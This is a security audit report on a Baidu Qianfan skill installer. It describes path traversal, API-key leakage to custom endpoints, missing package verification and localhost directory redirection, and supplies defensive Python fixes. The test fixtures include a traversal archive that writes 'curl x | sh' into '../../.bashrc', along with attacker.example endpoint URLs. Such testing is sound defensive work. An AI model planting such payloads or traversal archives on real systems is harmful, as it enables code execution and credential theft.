qianfan clawhub
Warn
Audited by ClawScan on May 10, 2026.
Overview
The skill matches its marketplace purpose, but its installer has unsafe package extraction and credential-routing behavior that users should review before using.
Use this only with a trusted Baidu endpoint, avoid custom --endpoint values unless you fully trust the server, set an explicit safe --workdir, and install only trusted skill slugs until ZIP path validation and package verification are added.
Findings (4)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
A malformed or malicious skill package could place or overwrite files outside the expected Qianfan skills folder under the user's permissions.
The install destination is built from the requested slug and ZIP member names without a visible normalization or bounds check; malicious '..' or absolute paths in a slug or archive could write outside the intended skill directory.
skill_dir = os.path.join(self.skills_dir, slug_name) ... target_path = os.path.join(skill_dir, target_name) ... target_path = os.path.join(skill_dir, name)
Reject slugs and ZIP entries containing absolute paths, '..', drive prefixes, or symlink escapes, and verify each resolved path remains inside the intended skill directory before writing.
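One way to implement the containment check the finding calls for. This is an added example, not the skill's own installer code: names such as extract_skill, safe_target and UnsafePathError are hypothetical, the slug character allowlist is an assumed policy, and the archives built in demo() are constructed test input rather than real skill packages. It rejects absolute member names and drive prefixes, '..' components, symlink entries, and any path that does not resolve back under the skill directory, and it checks every member before writing the first one.

```python
from __future__ import annotations

import io
import ntpath
import os
import re
import stat
import tempfile
import zipfile

# Added example: a contained replacement for bare os.path.join(skills_dir, slug)
# and os.path.join(skill_dir, name). Names and the slug policy are hypothetical.
SLUG_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}")  # no dots, separators or drive letters


class UnsafePathError(ValueError):
    """A slug or archive member would land outside the intended skill directory."""


def validate_slug(slug: str) -> str:
    # A character allowlist rejects '..', '/', '\\', 'C:' and leading dots in one check.
    if not SLUG_RE.fullmatch(slug):
        raise UnsafePathError(f"unsafe slug: {slug!r}")
    return slug


def safe_target(skill_dir: str, member_name: str) -> str:
    """Map a ZIP member name onto skill_dir, or raise if it cannot be contained."""
    # ntpath.splitdrive catches 'C:' and '\\\\server\\share' prefixes on any host OS.
    if member_name.startswith(("/", "\\")) or ntpath.splitdrive(member_name)[0]:
        raise UnsafePathError(f"absolute member name: {member_name!r}")
    parts = [p for p in member_name.replace("\\", "/").split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise UnsafePathError(f"traversal in member name: {member_name!r}")
    root = os.path.realpath(skill_dir)
    target = os.path.realpath(os.path.join(root, *parts))
    # realpath follows symlinks already on disk, so the containment check also
    # catches a link that points out of the tree.
    if os.path.commonpath([root, target]) != root:
        raise UnsafePathError(f"member escapes skill directory: {member_name!r}")
    return target


def extract_skill(zip_bytes: bytes, skills_dir: str, slug: str) -> list[str]:
    """Extract an archive into skills_dir/<slug>, refusing symlinks and escapes.

    Every member is checked before the first write, so a bad archive leaves
    no partial install behind. Returns the relative paths written.
    """
    skill_dir = os.path.join(skills_dir, validate_slug(slug))
    root = os.path.realpath(skill_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = zf.infolist()
        for info in infos:
            if stat.S_ISLNK(info.external_attr >> 16):
                raise UnsafePathError(f"symlink member: {info.filename!r}")
            safe_target(skill_dir, info.filename)
        written: list[str] = []
        for info in infos:
            target = safe_target(skill_dir, info.filename)  # re-check at write time
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(target, root).replace(os.sep, "/"))
    return written


def build_zip(members: dict[str, bytes]) -> bytes:
    """Build an in-memory archive (constructed test input, not a real skill package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def demo() -> dict[str, object]:
    """Run the extractor against a clean package, a traversal package and a bad slug."""
    clean = build_zip({"SKILL.md": b"# demo", "src/main.py": b"print('hi')\n"})
    traversal = build_zip({"SKILL.md": b"# demo", "../../.bashrc": b"curl x | sh\n"})
    results: dict[str, object] = {}
    with tempfile.TemporaryDirectory() as tmp:
        results["clean"] = extract_skill(clean, tmp, "demo-skill")
        for key, (pkg, slug) in {"traversal": (traversal, "demo-skill"),
                                 "slug": (clean, "../escape")}.items():
            try:
                extract_skill(pkg, tmp, slug)
                results[key] = "accepted"
            except UnsafePathError as exc:
                results[key] = str(exc)
        results["files_on_disk"] = sorted(os.listdir(os.path.join(tmp, "demo-skill")))
    return results


if __name__ == "__main__":
    print(demo())
```

Refusing symlink members outright is what makes the realpath containment check sufficient: with no links created during extraction, a later member cannot be redirected through one planted by an earlier member.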
If a user or agent uses an untrusted endpoint, the Baidu API key could be disclosed to that server.
The required BAIDU_API_KEY is sent as a Bearer token to whatever endpoint is supplied, while SKILL.md frames the integration as Baidu Cloud services and does not clearly warn about custom endpoints.
parser.add_argument('--endpoint', type=str, default=None, help='指定 API 服务器地址') ... url = f"{self.endpoint}/v2/skills/download" ... headers = {'Authorization': f'Bearer {self.api_key}'}
(The --endpoint help text translates to "Specify the API server address".)
Default to and allowlist the Baidu endpoint, or require explicit user confirmation before sending BAIDU_API_KEY to any custom endpoint.
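A gate that sits between the --endpoint argument and the Bearer header, as an added example rather than code from the skill. The allowlisted host and default URL are assumptions (substitute the endpoint the skill actually documents), and the --confirm-endpoint flag named in the error message is hypothetical. Only https with an exact host match is accepted silently; a URL with embedded userinfo is rejected because https://allowed-host@attacker.example/ parses the allowed name as a username and sends the request elsewhere.

```python
from __future__ import annotations

from urllib.parse import urlsplit

# Added example: these values are assumptions, not taken from the skill.
DEFAULT_ENDPOINT = "https://qianfan.baidubce.com"
ALLOWED_HOSTS = frozenset({"qianfan.baidubce.com"})


class EndpointError(ValueError):
    """The endpoint is not one the API key should be sent to."""


def check_endpoint(endpoint: str | None, confirmed: bool = False) -> str:
    """Return a normalised base URL, or raise if the key must not go there."""
    if endpoint is None:
        endpoint = DEFAULT_ENDPOINT
    parts = urlsplit(endpoint)
    if parts.scheme != "https":
        raise EndpointError(f"refusing to send a Bearer token over {parts.scheme or 'no'} scheme")
    if parts.username is not None or parts.password is not None:
        # 'https://qianfan.baidubce.com@attacker.example/' has hostname attacker.example.
        raise EndpointError("userinfo in endpoint URL")
    host = parts.hostname  # already lowercased by urlsplit
    if not host:
        raise EndpointError("endpoint has no host")
    base = f"https://{parts.netloc}{parts.path.rstrip('/')}"
    if host in ALLOWED_HOSTS:  # exact match: no suffix or prefix tricks
        return base
    if not confirmed:
        raise EndpointError(
            f"{host} is not an allowlisted Baidu endpoint; re-run with "
            "--confirm-endpoint (hypothetical flag) to send BAIDU_API_KEY to it anyway")
    return base


def endpoint_accepted(endpoint: str | None, confirmed: bool = False) -> bool:
    """Boolean view of check_endpoint, convenient for tests and CLI pre-checks."""
    try:
        check_endpoint(endpoint, confirmed)
        return True
    except EndpointError:
        return False


def build_download_request(api_key: str, endpoint: str | None = None,
                           confirmed: bool = False) -> tuple[str, dict[str, str]]:
    """Assemble the download URL and headers; the key is attached only after the check."""
    base = check_endpoint(endpoint, confirmed)
    url = f"{base}/v2/skills/download"
    headers = {"Authorization": f"Bearer {api_key}"}
    return url, headers


if __name__ == "__main__":
    print(build_download_request("sk-demo"))
    for candidate in ("http://qianfan.baidubce.com",
                      "https://qianfan.baidubce.com@attacker.example/",
                      "https://attacker.example"):
        print(candidate, "->", endpoint_accepted(candidate))
```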
Users may assume installed skills have been verified, but the code appears to rely only on the remote response and ZIP parsing.
Downloaded skill packages are trusted and written directly; the reviewed source does not show signature, hash, manifest, or provenance verification despite SKILL.md describing integrated 'verification'.
response = requests.get(url, params=params, headers=headers, timeout=60) ... with zipfile.ZipFile(io.BytesIO(response.content)) as zf: ... dst.write(src.read())
Add package signature or checksum verification and document exactly what is verified before installation.
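A minimal form of the recommended check, added here as an example and not the skill's own code: verify the raw download against a pinned SHA-256 digest before zipfile ever parses it. The assumptions are that expected_sha256 comes from somewhere other than the download response itself (a pinned value in a signed manifest or the marketplace listing; a digest served next to the file by the same server only detects corruption, not a malicious server), that the size cap is 50 MiB, and that the function and exception names are invented for illustration. The package built in build_sample_package() is constructed test input.

```python
from __future__ import annotations

import hashlib
import hmac
import io
import re
import zipfile

# Added example; the cap and the names below are assumptions.
MAX_PACKAGE_BYTES = 50 * 1024 * 1024
SHA256_HEX = re.compile(r"[0-9a-f]{64}")


class VerificationError(ValueError):
    """The package did not match what the caller expected to install."""


def verify_package(data: bytes, expected_sha256: str) -> str:
    """Check size and SHA-256 of the raw bytes; return the hex digest on success."""
    if len(data) > MAX_PACKAGE_BYTES:
        raise VerificationError(f"package too large: {len(data)} bytes")
    expected = expected_sha256.strip().lower()
    if not SHA256_HEX.fullmatch(expected):
        raise VerificationError("expected digest is not 64 hex characters")
    actual = hashlib.sha256(data).hexdigest()
    # compare_digest avoids leaking the position of the first mismatching byte.
    if not hmac.compare_digest(actual, expected):
        raise VerificationError(f"sha256 mismatch: got {actual}, expected {expected}")
    return actual


def list_verified_members(data: bytes, expected_sha256: str) -> list[str]:
    """Only parse the archive once the bytes have been verified."""
    verify_package(data, expected_sha256)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def build_sample_package() -> tuple[bytes, str]:
    """Constructed sample package and its pinned digest (not a real skill)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("SKILL.md", "# demo skill\n")
        zf.writestr("main.py", "print('hello')\n")
    data = buf.getvalue()
    return data, hashlib.sha256(data).hexdigest()


def demo() -> dict[str, object]:
    """Accept the intact package, reject a copy with a single flipped bit."""
    data, pinned = build_sample_package()
    results: dict[str, object] = {"intact": list_verified_members(data, pinned)}
    tampered = data[:-1] + bytes([data[-1] ^ 0x01])  # what a bad server or MITM might return
    try:
        list_verified_members(tampered, pinned)
        results["tampered"] = "accepted"
    except VerificationError as exc:
        results["tampered"] = str(exc).split(":")[0]
    return results


if __name__ == "__main__":
    print(demo())
```

Verifying before parsing matters because zipfile is itself attack surface; a mismatching package should never reach it. A checksum still does not tell the user who produced the package, which is why the finding also asks for a signature or provenance statement.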
A local process listening on port 4096 could redirect where downloaded skill files are installed.
When --workdir is not provided, an unauthenticated localhost service can determine the default skills directory, which differs from the documented default-only behavior.
response = requests.get("http://localhost:4096/path", timeout=5) ... json_data = response.json() ... self.skills_dir = os.path.join(json_data['directory'], 'skills')
Document this local path lookup, validate the returned path, and consider requiring an explicit --workdir or trusted local service identity before using it.
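An added example of validating the localhost lookup rather than trusting it; this is not the skill's code. The response shape {"directory": ...} is the one the finding quotes, but the acceptance policy (an explicit --workdir wins; a discovered directory must be an absolute path that resolves through any symlinks to an existing directory strictly under the user's home) and the function and exception names are assumptions. The HTTP call is left out so the example runs offline: the caller passes the response body as a string, and demo() feeds it constructed responses against a temporary home directory.

```python
from __future__ import annotations

import json
import os
import tempfile
from pathlib import Path

# Added example; the acceptance policy and names are assumptions.


class ConfigError(ValueError):
    """No acceptable skills directory could be determined."""


def resolve_skills_dir(workdir: str | None, discovery_body: str | None,
                       home: str | None = None) -> str:
    """Return the absolute skills directory to use, or raise ConfigError."""
    home_dir = Path(home or Path.home()).resolve()
    if workdir:
        base = Path(workdir)
        if not base.is_absolute():
            raise ConfigError(f"--workdir must be absolute, got {workdir!r}")
        return str(base.resolve() / "skills")

    if discovery_body is None:
        raise ConfigError("no --workdir given and the local path service did not answer")
    try:
        data = json.loads(discovery_body)
    except json.JSONDecodeError as exc:
        raise ConfigError(f"local path service returned invalid JSON: {exc}") from exc
    directory = data.get("directory") if isinstance(data, dict) else None
    if not isinstance(directory, str) or not directory:
        raise ConfigError("local path service response lacks a string 'directory'")
    base = Path(directory)
    if not base.is_absolute():
        raise ConfigError(f"discovered directory is not absolute: {directory!r}")
    resolved = base.resolve()  # follows symlinks before the containment check
    if home_dir not in resolved.parents:
        raise ConfigError(f"discovered directory {resolved} is outside {home_dir}")
    if not resolved.is_dir():
        raise ConfigError(f"discovered directory {resolved} does not exist")
    return str(resolved / "skills")


def demo() -> dict[str, str]:
    """Exercise the resolver with a constructed home directory and responses."""
    results: dict[str, str] = {}
    with tempfile.TemporaryDirectory() as home:
        app = Path(home, "clawhub")
        app.mkdir()
        cases = {
            "explicit": (str(app), None),
            "discovered": (None, json.dumps({"directory": str(app)})),
            "outside_home": (None, json.dumps({"directory": "/etc"})),
            "not_a_string": (None, json.dumps({"directory": 4096})),
            "missing": (None, json.dumps({"directory": str(app / "nope")})),
            "relative": ("clawhub", None),
        }
        for name, (workdir, body) in cases.items():
            try:
                chosen = resolve_skills_dir(workdir, body, home)
                results[name] = os.path.relpath(chosen, Path(home).resolve())
            except ConfigError:
                results[name] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```

Even with these checks, anything on the loopback interface can still answer on port 4096, so the validation bounds the damage rather than authenticating the service; requiring --workdir (or a stronger local identity check) remains the safer default.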
